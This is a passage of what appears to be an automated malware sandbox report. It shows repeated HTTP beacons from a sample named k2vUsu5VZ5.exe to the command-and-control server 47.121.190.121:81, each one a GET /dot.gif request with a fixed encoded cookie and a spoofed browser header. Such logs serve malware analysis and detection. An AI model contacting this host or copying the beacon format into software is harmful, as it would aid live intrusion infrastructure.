              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:15.252454042 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:15 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              70192.168.2.44992647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:15.371932983 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:16.440069914 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:16 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              71192.168.2.44993247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:16.668273926 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:17.614890099 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:17 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              72192.168.2.44993947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:17.754844904 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:18.708796978 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:18 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              73192.168.2.44994847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:18.860543013 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:19.801464081 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:19 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              74192.168.2.44995547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:19.936959028 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:20.911350012 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:20 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              75192.168.2.44996347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:21.046225071 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:22.022670984 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:21 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              76192.168.2.44997147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:22.217961073 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:23.167850018 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:23 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              77192.168.2.44997847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:23.297537088 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:24.294481039 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:24 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              78192.168.2.44998847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:24.671117067 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:25.657701969 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:25 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              79192.168.2.44999647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:25.953855038 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:27.021359921 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:26 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              80192.168.2.45000547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:27.302829027 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:28.241074085 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:28 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              81192.168.2.45001247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:28.358308077 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:29.362265110 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:29 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              82192.168.2.45002047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:29.482963085 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:30.463933945 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:30 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              83192.168.2.45002847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:30.582952023 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:31.677527905 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:31 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              84192.168.2.45003547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:31.811155081 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:32.800879002 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:32 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              85192.168.2.45004247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:33.062242985 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:34.118453979 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:33 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              86192.168.2.45005147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:34.234083891 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:35.329574108 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:35 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              87192.168.2.45006047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:35.477564096 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:36.560506105 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:36 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              88192.168.2.45006847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:36.736404896 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:37.695861101 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:37 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              89192.168.2.45007647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:37.925925016 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:38.963721991 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:38 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              90192.168.2.45008347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:39.143357038 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:40.162225008 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:40 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              91192.168.2.45009347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:40.280900955 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:41.262742043 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:41 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              92192.168.2.45009447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:41.380564928 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:42.357970953 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:42 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              93192.168.2.45009547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:42.468519926 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:43.525248051 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:43 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              94192.168.2.45009647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:43.645613909 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:44.676873922 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:44 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              95192.168.2.45009747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:44.804044962 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:45.743275881 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:45 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              96192.168.2.45009847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:45.990778923 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:47.011348009 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:46 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              97192.168.2.45009947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:47.190807104 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:48.148272038 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:47 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              98192.168.2.45010047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:48.268452883 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
